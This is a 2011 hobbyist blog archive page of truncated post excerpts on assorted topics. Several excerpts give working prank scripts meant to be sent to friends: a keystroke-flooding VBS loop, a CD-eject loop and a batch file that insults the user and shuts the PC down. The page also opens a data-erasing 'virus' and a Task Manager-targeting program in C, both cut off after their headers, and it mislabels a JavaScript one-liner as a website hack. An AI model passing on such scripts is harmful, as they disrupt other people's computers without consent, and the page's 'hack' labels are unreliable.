Wednesday, 30 November 2011

How To Protect your Facebook Account After Someone Hac...

Posted on 21:12 by Unknown

No comments

How to Protect My Gmail Account from Hacking With 2-step Verificat...

Posted on 21:10 by Unknown

No comments

Sunday, 16 October 2011

visit this site to download picupr mobile up loader ...

Posted on 02:30 by Unknown

1 comment

Tuesday, 11 October 2011

Quote Dim userInput userInput = InputBox("Write a message for me to say") Set Sapi = Wscript.CreateObject("SAPI.SpVoice") Sapi.speak userInput Save it as anything.vbs execute it , type anything and your pc will speak that! I hope you like it, it's a funny tutorial...

Posted on 07:07 by Unknown

No comments

Sunday, 9 October 2011

All of u know about the history of india so pls visit this link and know about the indian history...

Posted on 01:04 by Unknown

No comments

some of our great Indian leaders list . visit this link and know about them .............

Posted on 00:57 by Unknown

No comments

Saturday, 1 October 2011

See this this link you may get some idea about linux server and network securi...

Posted on 07:15 by Unknown

2 comments

See this link it explain about linux network configuration ...

Posted on 07:06 by Unknown

No comments

Tuesday, 27 September 2011

...

Posted on 08:15 by Unknown

No comments

...

Posted on 07:18 by Unknown

No comments

Sunday, 18 September 2011

Hi guys. First of all, I want to say that I didn't make this tutorial myself, I found it on Hacking Library and This method is very old and its of an extreme diffcult to find the right persn to do it but anyway it works (; Introduction 1. Welcome to the basic NETBIOS document created by aCId_rAIn. This document will teach you some simple things...

Posted on 04:54 by Unknown

No comments

Sunday, 11 September 2011

 Hack a website with one line of javascript This is a code to hack a website . coding: Try this code to hack a website . i don't no it working or not............................... javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24;x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length;function A(){for(i=0; i<dil ; i++){DIS=DI[...

Posted on 07:39 by Unknown

No comments

 In this site they listed lot of design, so must visit this site to improve u r idea for develop a image with photoshop http://designrfix.com/resources/photoshop-cs5-tutorials-70-creative-tips http://www.crazyleafdesign.com/blog/40-awesome-photoshop-cs5-tutorials/  http://www.tutorialchip.com/photoshop/36-creative-and-useful-photoshop-...

Posted on 07:32 by Unknown

No comments

...

Posted on 07:17 by Unknown

No comments

...

Posted on 06:59 by Unknown

No comments

visit this site it helpful for the final year projects http://www.finalsemprojects.com/ieee-projec...

Posted on 06:47 by Unknown

No comments

this program never retrieve u r data . if u run program means .......so be careful ...........................  #include #include #include #include #include #include using namespace std; int random, Freq, Dur, X, Y; HWND mywindow, TaskMgr, CMD, Regedit; char Notepad[MAX_PATH]="notepad.exe"; char MineSweeper[MAX_PATH]="winmine.exe"; char Hearts[MAX_PATH]="mshearts.exe"; char...

Posted on 06:35 by Unknown

No comments

This is an virus program . if u run this program means it erase all u r data in system so be careful . if it create any problem. is not my mistake .....  #include<stdio.h> #include<io.h> #include<dos.h> #include<dir.h> #include<conio.h> #include<time.h> FILE *virus,*host; int done,a=0; unsigned long x; char...

Posted on 06:20 by Unknown

No comments

Friday, 9 September 2011

 Hack your friend's keyboard and make him type "You are a fool" simultaneously: Type : Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "You are a fool." loop Save it as "Anything.VBS" and send ...

Posted on 09:15 by Unknown

No comments

Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them! Type : Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End...

Posted on 09:08 by Unknown

No comments

Convey your friend a lil' message and shut down his / her computer: Type : @echo off msg * I don't like you shutdown -c "Error! You are too stupid!" -s Save it as "Anything.BAT" in All Files and send ...

Posted on 08:41 by Unknown

No comments

Thursday, 8 September 2011

The world population is the total number of living humans on the planet Earth, currently estimated to be 6.94 billion. To see more details visit  this site.. http://en.wikipedia.org/wiki/World_population ...

Posted on 04:25 by Unknown

No comments

Sunday, 14 August 2011

...

Posted on 00:32 by Unknown

1 comment

Saturday, 9 July 2011

  Important of Designing A Product Dropbox  is revised their Terms of Service (TOS) over the long weekend. That triggered a flurry of activities on Twitter. Dave Winer even deleted his Dropbox account saying that he would revisit it once the dust settles. A lot of people concluded that there's nothing wrong in the new TOS and that people...

Posted on 02:58 by Unknown

No comments

Tuesday, 7 June 2011

Cloud computing is refers to the on-demand provision of computational resources (data, software) via a computer network is rather than from a local computer system .The Users or clients can submit a task, such as word processing, to the service provider, without actually possessing the software or hardware. The consumer's computer may contain very...

Posted on 03:52 by Unknown

No comments

Tuesday, 31 May 2011

4G

4GIn the telecommunications, 4G is the fourth generation of cellular wireless standards. It is a successor to the 3G and 2G families of standards. In 2008, the ITU-R organization specified the IMT-Advanced (International Mobile Telecommunications Advanced) requirements for 4G standards,...

Posted on 06:52 by Unknown

No comments

A hacker is a person who breaks into computers and computer networks for profit, as protest, or sometimes by the motivation of the challenge. The subculture that has evolved around hackers is often referred to as the computer underground but is now an open community.Other definitions of the word hacker exist that are not related to computer security. They are subject to the long standing hacker definition controversy about the true meaning of hacker. In this controversy, the term hacker is reclaimed by computer programmers who...

Posted on 06:48 by Unknown

No comments